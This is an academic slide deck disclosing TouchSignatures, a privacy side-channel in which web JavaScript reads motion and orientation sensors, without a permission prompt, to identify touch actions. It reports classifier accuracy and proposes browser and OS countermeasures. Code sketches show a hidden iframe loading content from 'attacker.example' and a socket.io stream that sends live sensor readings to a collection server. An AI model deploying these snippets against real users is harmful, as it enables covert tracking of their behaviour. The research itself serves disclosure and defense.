
TOUCHSIGNATURES
Maryam Mehrnezhad, Ehsan Toreini, Siamak F. Shahandashti, Feng Hao

Newcastle University

CryptoForma meeting, Belfast

4 May 2015

The Attack
• Identification of User Touch Actions Based on Mobile Sensor Data via JavaScript
• Accepted at ASIACCS’15

Touch actions and their descriptions:
• Click: Touching an item momentarily with one finger
• Scroll (Up, Down, Right, Left): Touching continuously and simultaneously sliding in the corresponding direction
• Zoom (In, Out): Placing two fingers on the screen and sliding them apart or toward each other, respectively
• Hold: Touching continuously for a while with one finger

HTML 5
• HTML5 is moving toward handling system functionality, with ideas such as B2G (Boot to Gecko) by Mozilla.
• With that in mind, it is not surprising that HTML5 can access mobile sensor-related data.

HTML 5
• Currently, mobile web applications have access to the following sensors:
  • Geolocation
  • Multimedia (video, camera, microphone, webcam)
  • Ambient light
  • Motion and orientation

HTML 5
• According to W3C specifications, modern web browsers allow JavaScript code to access motion and orientation sensor data (a listener sketch follows).
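
A minimal JavaScript sketch of the two W3C event listeners (deviceorientation and devicemotion); the console logging is purely illustrative:

// W3C DeviceOrientation Event spec: orientation as three rotation angles in degrees
window.addEventListener('deviceorientation', function (e) {
  console.log('alpha:', e.alpha, 'beta:', e.beta, 'gamma:', e.gamma);
});

// Motion: acceleration with/without gravity (m/s^2), rotation rate (deg/s) and reading interval (ms)
window.addEventListener('devicemotion', function (e) {
  var acc = e.acceleration;                  // may be null on devices without a gyroscope
  var accG = e.accelerationIncludingGravity;
  var rot = e.rotationRate;
  console.log(acc, accG, rot, e.interval);
});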

Core Idea
• This project targets these questions:
  • What are the possible privacy leakages?
  • Is it possible to recognize user actions using the sensor data acquired by JavaScript?
• Neither iOS nor Android asks permission to access these sensors via the browser.
• Accessing sensor data within mobile apps has already been studied: various security and privacy attacks exist in the literature.

Some Challenges
• Mobile in-browser sensor data access is restricted to two streams:
  • Orientation: supplies the physical orientation of the device
  • Device motion: the acceleration of the device
• In-browser access is limited in contrast to raw sensor data access in native applications:
  • Processed data
  • Low-rate streams, with frequencies around 5 to 10 times slower than in-app data (a small rate-measurement sketch follows)
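
A small, purely illustrative sketch of how one could estimate the delivered in-browser sampling rate by counting devicemotion events per second:

// Count delivered devicemotion events over one-second windows to estimate the effective rate
var readings = 0;
window.addEventListener('devicemotion', function () { readings++; });
setInterval(function () {
  console.log('~' + readings + ' motion readings per second');
  readings = 0;
}, 1000);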

Privacy Breaches
• Unlike other sensor accesses, no authorization is required from the user to access orientation and acceleration data.
• This could leak information such as:
  • User physical movements (walking, running, sitting)
  • User interactions with the device that have specific patterns (such as answering calls or taking photos)
  • User touch actions

Touch Actions
• Identification of touch actions may reveal a range of activities about the user’s interaction with other webpages.
• E.g. users tend to mostly scroll on a news website, while they mostly type when using an email client.

TouchSignatures
• Our system is able to distinguish user touch actions given access to the device motion and orientation sensor data.
• Attack model: malicious web content spying on a user via JavaScript.
  • The content is loaded via an iframe embedded in the webpage (sketched below).
  • The browser is running either actively or passively in the background.
  • The user has access to the Internet.
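
A minimal sketch of how such content can be pulled in; the URL here is hypothetical and stands in for any attacker-controlled page carrying the sensor-reading JavaScript:

// Hidden iframe pulling in attacker-controlled content (URL is hypothetical)
var frame = document.createElement('iframe');
frame.src = 'https://attacker.example/listener.html'; // page containing the sensor-reading JavaScript
frame.style.display = 'none';
document.body.appendChild(frame);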

Some Technical Details
• According to W3C, HTML5 and JavaScript provide access to the following sensor data:
  • Device orientation: three rotations, alpha, beta and gamma
  • Device acceleration: Cartesian coordinates x, y and z
  • Device acceleration including gravity
  • Device rotation rate: three rotations, alpha, beta and gamma
  • Interval: the rate of sensor reading, in milliseconds
• We have developed TouchSignatures:
  • Server side built on Node.js and MongoDB
  • Client-side JavaScript using the socket.io library to send live sensor data streams (sketched below)
  • Supervised machine learning techniques to analyse the data
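
A minimal client-side sketch under this design, assuming the socket.io client script is loaded and a collection server is reachable at a hypothetical URL; the 'reading' and 'orientation' event names are chosen here only for illustration:

// Assumes the socket.io client script is loaded; server URL and event names are illustrative
var socket = io('https://collector.example');

window.addEventListener('devicemotion', function (e) {
  socket.emit('reading', {
    t: Date.now(),
    acc: e.acceleration,                   // x, y, z
    accG: e.accelerationIncludingGravity,  // x, y, z
    rot: e.rotationRate,                   // alpha, beta, gamma
    interval: e.interval
  });
});

window.addEventListener('deviceorientation', function (e) {
  socket.emit('orientation', { t: Date.now(), alpha: e.alpha, beta: e.beta, gamma: e.gamma });
});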

Experiments

Touch actions and their descriptions:
• Click: Touching an item momentarily with one finger
• Scroll (Up, Down, Right, Left): Touching continuously and simultaneously sliding in the corresponding direction
• Zoom (In, Out): Placing two fingers on the screen and sliding them apart or toward each other, respectively
• Hold: Touching continuously for a while with one finger

Experiments
• We collected data from 11 volunteers.
• We gave each user a brief introduction and instructions to perform 8 touch actions.
• Experiments were performed with Google Chrome on an iPhone 5.
• We asked each user to perform each action 5 times.
• Two ways of holding the phone were measured: two-handed and one-handed.
• In the end, we had 10 samples of each touch action for each of the 11 participants.

Feature Extraction
• Time-domain features:
  • Raw captured sequence
  • First-order derivative of each sequence
  • Maximum, minimum and mean of each sequence and its derivative
  • Total energy of each sequence and its derivative
  • Plus further features, for a total of 116 features per touch action
• Frequency-domain features:
  • FFT of the sequences
  • Maximum, minimum, mean and energy of each FFT sequence
  • 48 features in total
• In total, 164 features for each sequence (a sketch of the time-domain part follows).
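
An illustrative sketch of a few of the time-domain features above (maximum, minimum, mean, total energy, and the first-order derivative) for one captured sequence; it does not reproduce the full 116/48-feature set:

// Basic time-domain features of one sensor sequence (array of numbers)
function timeFeatures(seq) {
  var max = Math.max.apply(null, seq);
  var min = Math.min.apply(null, seq);
  var mean = seq.reduce(function (s, v) { return s + v; }, 0) / seq.length;
  var energy = seq.reduce(function (s, v) { return s + v * v; }, 0); // total energy
  return { max: max, min: min, mean: mean, energy: energy };
}

// First-order derivative: differences between consecutive samples
function derivative(seq) {
  var d = [];
  for (var i = 1; i < seq.length; i++) d.push(seq[i] - seq[i - 1]);
  return d;
}

// Features of the raw sequence and of its derivative, mirroring the list above
function extract(seq) {
  return { raw: timeFeatures(seq), diff: timeFeatures(derivative(seq)) };
}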

Classification Process
• We implemented different classification algorithms:
  • Artificial Neural Networks (ANN)
  • k-Nearest Neighbour (k-NN)
  • Decision Tree
• We used a 10-fold cross-validation approach.
• 1-NN showed the best performance (a minimal 1-NN sketch follows).
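
A minimal sketch of the 1-NN step, assuming feature vectors have already been extracted as above; the training-set format is chosen here for illustration:

// Squared-distance comparison is enough to find the nearest neighbour
function distance(a, b) {
  var s = 0;
  for (var i = 0; i < a.length; i++) s += (a[i] - b[i]) * (a[i] - b[i]);
  return s;
}

// train: array of { features: [...], label: 'click' | 'scroll up' | ... } (format assumed here)
function classify1NN(train, sampleFeatures) {
  var bestLabel = null, bestDist = Infinity;
  train.forEach(function (ex) {
    var d = distance(ex.features, sampleFeatures);
    if (d < bestDist) { bestDist = d; bestLabel = ex.label; }
  });
  return bestLabel;
}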

Phase 1 Classification
Touch action and identification rate:
• Click: 78.18%
• Hold: 88.18%
• Scroll: 95.91%
• Zoom In: 71.82%
• Zoom Out: 76.36%
• Overall: 87.39%

Phase 2 Classification
Touch action and identification rate:
• Scroll Down: 57.27%
• Scroll Up: 69.09%
• Scroll Right: 48.18%
• Scroll Left: 71.82%
• Overall: 61.59%

Contribution of Different Sensor Data Streams
• Orientation has the biggest impact on the final results.
• The rest of the sensor data streams combined affect the results by only 3.64%.

Browser Support
• Table: comparison of popular browsers’ sensor accessibility on Android/iOS, listed per Device / Mobile OS / Browser.
• Column legend:
  • Device/mOS/Browser: the device, mobile OS and browser name
  • Active: the browser is running actively and interacting with the user
  • Background: the browser is not active, but is running in the background
  • Locked: the browser is not active and the device screen is locked
  • Each status is further broken down by where the manipulated content sits: the visited webpage itself (same), embedded within it, e.g. in an iframe (intra), or another tab (other).
[Per-browser results table not shown in this transcript]

Possible Solutions

• Notify users within the browser
• Operating system settings

Future?
• Is it possible to recognize which keys have been pressed using this low-rate data?
• Other privacy breaches?
• Open to any other suggestions…

Conclusion
• First to perform a practical privacy attack via sensor data using JavaScript.
• User actions can be recognized from this sensor data, even though it is processed and provided at low rates.
• This shows a major shortcoming in mobile operating systems’ and browsers’ access control policies with respect to user privacy.
• We suggest applying the same approach as for GPS access, by providing effective user notification and control mechanisms.

• THANKS!

